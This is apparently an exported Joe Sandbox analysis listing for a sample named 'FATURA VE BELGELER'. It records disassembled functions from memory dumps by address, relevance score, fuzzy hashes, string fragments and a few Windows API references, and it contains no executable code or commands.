Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: feab2367a7b965b4dd5d5c40d2b7d2e6f10e3c35b62adcb9c69b9feaab6ca516
Instruction ID: 5a84203ad88c519c567880d7b96206afadb10c4834b7b72875463484db18c04f
Opcode Fuzzy Hash: feab2367a7b965b4dd5d5c40d2b7d2e6f10e3c35b62adcb9c69b9feaab6ca516
Instruction Fuzzy Hash: BA81A278E41218CFDB14DFAAD984A9DBBF2BF89300F14C06AE409EB265DB349945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0281C7B1 Relevance: 6.4, Strings: 5, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 0281C98F
0o@p, xrefs: 0281C822
Lj@p, xrefs: 0281C9A5
PH]q, xrefs: 0281CA07
PH]q, xrefs: 0281CA18

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 679e2e408c5d70bb3c26ab6e16e3915145c14e658e3224cf1dd39d60cc45abd9
Instruction ID: c6bf1a0f8e2e341b22b29283f958086b1f8559f8bbfdee7ab3a10e5d38f1f1fa
Opcode Fuzzy Hash: 679e2e408c5d70bb3c26ab6e16e3915145c14e658e3224cf1dd39d60cc45abd9
Instruction Fuzzy Hash: E781C578E002188FDB14DFAAD984A9DBBF2BF89310F14C06AE409EB365DB349945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0281C4D0 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0281C738
Lj@p, xrefs: 0281C6C5
0o@p, xrefs: 0281C542
PH]q, xrefs: 0281C727
Lj@p, xrefs: 0281C6AF

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: e900133f47a78bb5a3e2689cdf35dcdb6db2de099016a9a463639f3f9435d8e8
Instruction ID: 096bf5c55a3555796def844afb14fd87e175a352841a8102f2d0afceefd0e2bc
Opcode Fuzzy Hash: e900133f47a78bb5a3e2689cdf35dcdb6db2de099016a9a463639f3f9435d8e8
Instruction Fuzzy Hash: C181C478E40218CFDB14DFAAD984A9DBBF2BF89300F14D06AE409AB365DB349945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0281CA91 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0281CCE7
Lj@p, xrefs: 0281CC85
Lj@p, xrefs: 0281CC6F
PH]q, xrefs: 0281CCF8
0o@p, xrefs: 0281CB02

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 4d2fe26a5ed995a66f57d3eebdf61b19ff3fc618210c7c86f94ff3392ef92bce
Instruction ID: 4f5ed1db907b8182d5557b18768b7fa7629378c3ab9e19c1c0a19bfa01327738
Opcode Fuzzy Hash: 4d2fe26a5ed995a66f57d3eebdf61b19ff3fc618210c7c86f94ff3392ef92bce
Instruction Fuzzy Hash: 1C818578E012189FDB14DFA9D984A9DBBF6BF88300F14C06AE809EB365DB349945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02814B31 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 02814D26
Lj@p, xrefs: 02814D10
PH]q, xrefs: 02814D99
PH]q, xrefs: 02814D88
0o@p, xrefs: 02814BA2

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 8717fcac5311f782fe54c5ff6ea90062b32f2b22678876f4a9bfdcb895cf2011
Instruction ID: c5acc927880b7d53c01442f0a180e8e1fec92a71afc64510f7bf31de05911ca8
Opcode Fuzzy Hash: 8717fcac5311f782fe54c5ff6ea90062b32f2b22678876f4a9bfdcb895cf2011
Instruction Fuzzy Hash: D281A378E012189FDB14DFA9D984A9DBBF6FF88300F148069E819AB265DB349985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0281B552 Relevance: 3.9, Strings: 3, Instructions: 162COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0281B7A7
0o@p, xrefs: 0281B5C2
PH]q, xrefs: 0281B7B8

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: 0o@p$PH]q$PH]q
API String ID: 0-2023588385
Opcode ID: 6f7af2f83c1f49276499e12ec242224d88c90e97d33f4d630664a8909d332456
Instruction ID: 598913181ca1b90c3a1676596b5f0bcbecd3e013c23b7a96a4069fdcf8a92df1
Opcode Fuzzy Hash: 6f7af2f83c1f49276499e12ec242224d88c90e97d33f4d630664a8909d332456
Instruction Fuzzy Hash: A661C678E012488FDB14DFAAD984A9DBBF2FF89314F148469E409EB365DB349946CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02819848 Relevance: 3.4, Strings: 2, Instructions: 899COMMON

Download Yara Rule

Strings

4']q, xrefs: 0281A2D3
(o]q, xrefs: 02819CD8

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: (o]q$4']q
API String ID: 0-176817397
Opcode ID: 790f549b6210b89c1a5ab675222bec72828834d2e639f5642d24fe0dc8b5202b
Instruction ID: 960ba4950d31a69450bf5c1c02bc126d1af7e20748397271329ba7eaf21f2b4b
Opcode Fuzzy Hash: 790f549b6210b89c1a5ab675222bec72828834d2e639f5642d24fe0dc8b5202b
Instruction Fuzzy Hash: 8482B07CA00209CFCB19CF68C494AAEBBF6FF89304F158559E809DB2A5D731E995CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02816168 Relevance: 3.0, Strings: 2, Instructions: 513COMMON

Download Yara Rule

Strings

(o]q, xrefs: 028166A2
Haq, xrefs: 0281656E

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: 400ab1800ad53a548dcf57d394eafb2b23d68465cf9763bd163a397f759ad086
Instruction ID: 021ef29ab0e0cad710055356f2fe182dedb16df31e0fa08f8841234d20d265c8
Opcode Fuzzy Hash: 400ab1800ad53a548dcf57d394eafb2b23d68465cf9763bd163a397f759ad086
Instruction Fuzzy Hash: A4129178A002198FDB14DF69C854BAEBBFAFF88304F108559E949DB395EB34D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0669908E Relevance: 2.7, Strings: 2, Instructions: 190COMMON

Download Yara Rule

Strings

PH]q, xrefs: 066992FB
PH]q, xrefs: 066992EA

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: d389fe55f9c86b1e45ced5c4e8093ad1c05931bf73dbb9e4fac401f1e63c9587
Instruction ID: ffbc6d0920a637d4ba8c807d49f0b963a4f2808214791a82b29231d26c45d858
Opcode Fuzzy Hash: d389fe55f9c86b1e45ced5c4e8093ad1c05931bf73dbb9e4fac401f1e63c9587
Instruction Fuzzy Hash: 7E81D374E00218CFDF58CFA9D994A9DBBF6BF89300F14816AD819AB354DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 066915F8 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc8710630efacc1fc745d59407045274851de839b753a73a1705a66d61ab55f
Instruction ID: 95770e2a3c66d454fd6c15799968b6cd08047801f662b7a0e85ef95e3f623518
Opcode Fuzzy Hash: cbc8710630efacc1fc745d59407045274851de839b753a73a1705a66d61ab55f
Instruction Fuzzy Hash: 81828B74E012298FDB64DF69CC84BDDBBB2BB88300F1485EA980DA7261DB305E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06698A58 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f2603bba7ba7e9979525a340d933387703364165ff109920a24d57bf910d24
Instruction ID: d772086f131bc25253ba2334b2db52ce119ced16f6e9343a6348ec5477f81edb
Opcode Fuzzy Hash: 02f2603bba7ba7e9979525a340d933387703364165ff109920a24d57bf910d24
Instruction Fuzzy Hash: 1AE1D274E00218CFDB54DFA5D944B9DBBB6FF89300F2081A9D808AB395DB355A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0669CE28 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbce650b779384161402a88a5415c1b105e832b06dbf04b0fb2c743ab78f7ce7
Instruction ID: dbe58cc165d787259dd25d909711b7d8949def27c1bbaaadd4983419d35e0d69
Opcode Fuzzy Hash: fbce650b779384161402a88a5415c1b105e832b06dbf04b0fb2c743ab78f7ce7
Instruction Fuzzy Hash: B2A1B275E016188FEB68CF6AC944B9DFBF2AF89300F14C0AAD40CA7255DB345A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0669DAC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 907b2e9f794a01355caee301341415c50efc796638c3e6b8433060fda57c5c68
Instruction ID: ad255c61c6315500b3ffc212e5c89eac4ab60a0d80bb5a4cac487369125904f0
Opcode Fuzzy Hash: 907b2e9f794a01355caee301341415c50efc796638c3e6b8433060fda57c5c68
Instruction Fuzzy Hash: 2DA1B274E016188FEB68CF6AD944B9DFBF6AF89300F14C0AAD408A7255DB705A85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0669BB38 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb136d60f0bd1e09a209c952b596b129d4b5e1eb46d463e8cde421e3b88978d
Instruction ID: e679f673575ef37a64025bfa6aa404537232880bd1f5183ab78ded074b61c372
Opcode Fuzzy Hash: 6fb136d60f0bd1e09a209c952b596b129d4b5e1eb46d463e8cde421e3b88978d
Instruction Fuzzy Hash: 31A1A275E01218CFEB64CF6AD944B9EBBF2AF89300F14C0AAD40DA7255DB305A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0669C7D8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64eb4d7c5c77de583e55af13b50d4de5cb3435d64ef97100c3ce5dc262cf7824
Instruction ID: 3657d8ff79669ef3fd4fe3d01fd2b1459a5f1baac4377d3fe7b426dda0a62df5
Opcode Fuzzy Hash: 64eb4d7c5c77de583e55af13b50d4de5cb3435d64ef97100c3ce5dc262cf7824
Instruction Fuzzy Hash: 83A1A275E012188FEB68CF6AC944B9DBBF2AF89300F14D0AAD40DA7255DB305A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0669A858 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 897dd7bdb9ef0b7b11c88f55703303f23bb7c826612ac8886e0f133091b5562c
Instruction ID: fc261142c3f22c0c85372c75b332ffebae5fb573f8fee7c10a8b8ac0285508bd
Opcode Fuzzy Hash: 897dd7bdb9ef0b7b11c88f55703303f23bb7c826612ac8886e0f133091b5562c
Instruction Fuzzy Hash: 41A19375E012188FEB68CF6AC944B9DBBF6BF89300F14C0AAD40DA7255DB345A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0669C188 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66248e44d9046f99739e0e003b9aceca537c97899775a4b037eae45e6790c2a0
Instruction ID: aa0087c7f856a24d811f5f9cfa4371be31c00fb1341a548595759c93c8777848
Opcode Fuzzy Hash: 66248e44d9046f99739e0e003b9aceca537c97899775a4b037eae45e6790c2a0
Instruction Fuzzy Hash: C9A1A375E012188FEB64CF6AD944B9DBBF2AF89300F14C0AAD40DA7255DB345A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0669AEA8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2e6b62148ecc389713fd3c4f49e67f4ed23f60bd20cea4499c0e1daa34eb5da
Instruction ID: 92367885038f5354b54a4fd37da983b2dcd551d8cdc0bac8d8e5e80f915c04a5
Opcode Fuzzy Hash: b2e6b62148ecc389713fd3c4f49e67f4ed23f60bd20cea4499c0e1daa34eb5da
Instruction Fuzzy Hash: 2EA19275E012188FEB64CF6AD944B9EFBF2AF89300F14C0AAD408B7255DB345A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0669D478 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882ce2cc139c2b557ee6d56b0a40e955f70080b2f878538c1f95405dd8efd719
Instruction ID: 8838f1976fcfe82a2c0c74c304a0c39d6682428753cae4dd8a02f5e95d65fe39
Opcode Fuzzy Hash: 882ce2cc139c2b557ee6d56b0a40e955f70080b2f878538c1f95405dd8efd719
Instruction Fuzzy Hash: 4AA19175E016188FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0669B4F0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2db4023a188c46e3c1cf6b73b554be661467fcf5985c8dacf4cac87f9ef1eab
Instruction ID: 142d910c22d938e0975e13bcc2791f109f721378db57d0440692166de02448cf
Opcode Fuzzy Hash: a2db4023a188c46e3c1cf6b73b554be661467fcf5985c8dacf4cac87f9ef1eab
Instruction Fuzzy Hash: 7DA1A475E012188FEB68CF6AD944B9EFBF2AF89300F14C1AAD40CA7255DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0669D468 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95ddd9ea51c9aec53ab1ed7247aeb0866edd8ad65cef05da8f514311176e775
Instruction ID: e418a9638a53cf48c8a02f4cfbd237714e4ae31d9fe0c09904b55f9165bbcc49
Opcode Fuzzy Hash: a95ddd9ea51c9aec53ab1ed7247aeb0866edd8ad65cef05da8f514311176e775
Instruction Fuzzy Hash: E9718471E016188FEB68CF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0669AE98 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766e6202127b0fe6913b1ed972c0f9dfbb7d5e9da40013d2e397440ae23b1afd
Instruction ID: 24df9adbab0aebe7bdc29d0884ebe264562f3a2072a41eae855b1c21a3416984
Opcode Fuzzy Hash: 766e6202127b0fe6913b1ed972c0f9dfbb7d5e9da40013d2e397440ae23b1afd
Instruction Fuzzy Hash: 95718471E016188FEB68CF6AD944B9EBBF2AF89300F14C0AAD50DA7254DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0669B4E0 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46735f38794a315456e88fc38003fe9d569b513c5c24b9ca15e292ee7e347a39
Instruction ID: c6bb6a9f24b96caf3b342d69e6c44a9b988c83bf2271b190339512cb653fb781
Opcode Fuzzy Hash: 46735f38794a315456e88fc38003fe9d569b513c5c24b9ca15e292ee7e347a39
Instruction Fuzzy Hash: 6E719471E016188FEB68CF6AD945B9EBBF2AF89300F14C1AAD40DA7254DB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06698A48 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b139538b70cd2dc313796b437b726b51146df68eed13b3fb79e1f21ee8662b8a
Instruction ID: 8915ac4ce956db9601105d5ccaf4b12afd5b69a6c4a3f56d07e0f4d456f3ab46
Opcode Fuzzy Hash: b139538b70cd2dc313796b437b726b51146df68eed13b3fb79e1f21ee8662b8a
Instruction Fuzzy Hash: F141F3B4D002088BEB58DFAAC9447DEFBF6BF89304F14C069D418AB294DB354A46CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0669A848 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2504c61472a48401be5ea73713a79f319f7493a792af2cf2c2ada59154351bed
Instruction ID: 1b1ddd11c93ef11587e91b7832456f4ce4fe487afc3d2775eda4071e0670f427
Opcode Fuzzy Hash: 2504c61472a48401be5ea73713a79f319f7493a792af2cf2c2ada59154351bed
Instruction Fuzzy Hash: F1416BB1D016188BEB58CF6BD94578AFBF7AFC9300F14C1AAD50CA6264DB740A86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0669DAAF Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51665fad77d20fecbea992ffdbe0df5d42b9d442abac01f3e28e85c2f5ebee22
Instruction ID: 25b54052df75510d1defa1216731cef7e8045df772618f2f2c831f2d4459c870
Opcode Fuzzy Hash: 51665fad77d20fecbea992ffdbe0df5d42b9d442abac01f3e28e85c2f5ebee22
Instruction Fuzzy Hash: 06416AB1D016188FEB58CF6BC94578AFAF3AFC9310F14C1AAD50CA6265DB740A86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0669CE18 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00a86732b34f8052e2c99a613983eea4bbb52d53cc22b4a3a9bf9e2d6a70933c
Instruction ID: b189ca05ef55d57ab069c9c605bb0b00e500ef5fdc2b1f582f0152d355466f93
Opcode Fuzzy Hash: 00a86732b34f8052e2c99a613983eea4bbb52d53cc22b4a3a9bf9e2d6a70933c
Instruction Fuzzy Hash: 10416C71D016188BEB58CF67CD457CAFAF3AFC9300F14C0AAD50CA6254DB740A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 0669C178 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0f2340a09cfdc12972c3e54257c85304b807041e11a77eda6021db55f72a40
Instruction ID: 8e5c4f4171ff35d64982b8900953ccd4e511fa8070f8093a9f63697790a7e4d3
Opcode Fuzzy Hash: 4b0f2340a09cfdc12972c3e54257c85304b807041e11a77eda6021db55f72a40
Instruction Fuzzy Hash: 134169B1D016188BEB58CF6BDD45789FAF3AFC9300F04C1AAD50CA7264DB740A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 0669BB27 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7481850b69d8eac8d23f5b30f9cd92723efc42c890293629c6c03670b1a777e
Instruction ID: 53e6d26a2259d4d66a175170ebbdd10383e2111934781c33c875336ee2f723e6
Opcode Fuzzy Hash: f7481850b69d8eac8d23f5b30f9cd92723efc42c890293629c6c03670b1a777e
Instruction Fuzzy Hash: 41413BB1D016188BEB58CF6BDD5578AFAF3BFC9300F14C1AAD50CA6264DB740A868F51

Uniqueness

Uniqueness Score: -1.00%

Function 0669C7CA Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b8ac59b3b21b34c28bc9b0383c285aeaee46e71bef7fe53a208bbf76e74d8f
Instruction ID: 8923416008802e4459d2647ec8527aa59bf8a4bd68fe826df88d6660aafd3437
Opcode Fuzzy Hash: e2b8ac59b3b21b34c28bc9b0383c285aeaee46e71bef7fe53a208bbf76e74d8f
Instruction Fuzzy Hash: CC4159B1E016188BEB58CF6BD94578AFAF3AFC9304F14C1AAD50CA6264DB740A858F51

Uniqueness

Uniqueness Score: -1.00%

Function 02816EB8 Relevance: 10.5, Strings: 8, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 02817358
(o]q, xrefs: 0281707A
,aq, xrefs: 02817368
(o]q, xrefs: 028173D7
(o]q, xrefs: 02816EF6
(o]q, xrefs: 02816FB1
(o]q, xrefs: 028173C7
(o]q, xrefs: 02816FDD

Memory Dump Source

Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: 95fb737ada0c1220c5b85652fcf9444cf962cf80a639812228b086fdcbce9be5
Instruction ID: 9aad13df58a421c8027e19e66d13e5324df60a74861cb36f4997484e57cf9eb7
Opcode Fuzzy Hash: 95fb737ada0c1220c5b85652fcf9444cf962cf80a639812228b086fdcbce9be5
Instruction Fuzzy Hash: 00124A38A00609CFCB15CF69D984A9EBBFAFF48314F548599E84ADB2A5D730ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 066B4B5A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066B4BE6
GetCurrentThread.KERNEL32 ref: 066B4C23
GetCurrentProcess.KERNEL32 ref: 066B4C60
GetCurrentThreadId.KERNEL32 ref: 066B4CB9

Strings

7#\, xrefs: 066B4B84

Memory Dump Source

Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 7#\
API String ID: 2063062207-3014239955
Opcode ID: cb0127626859bd9651d57060d72f15aedf0185176a078193be22d206e36a387a
Instruction ID: c31a02c627c90feaf9819dff11513ce846e485787b589a00732fbc68e85d6351
Opcode Fuzzy Hash: cb0127626859bd9651d57060d72f15aedf0185176a078193be22d206e36a387a
Instruction Fuzzy Hash: 945144B0D012498FDB94DFA9D948BEEBFF1EF48304F208059E009A7361DB395984CB61

Uniqueness

Uniqueness Score: -1.00%

Function 066B4B68 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066B4BE6
GetCurrentThread.KERNEL32 ref: 066B4C23
GetCurrentProcess.KERNEL32 ref: 066B4C60
GetCurrentThreadId.KERNEL32 ref: 066B4CB9

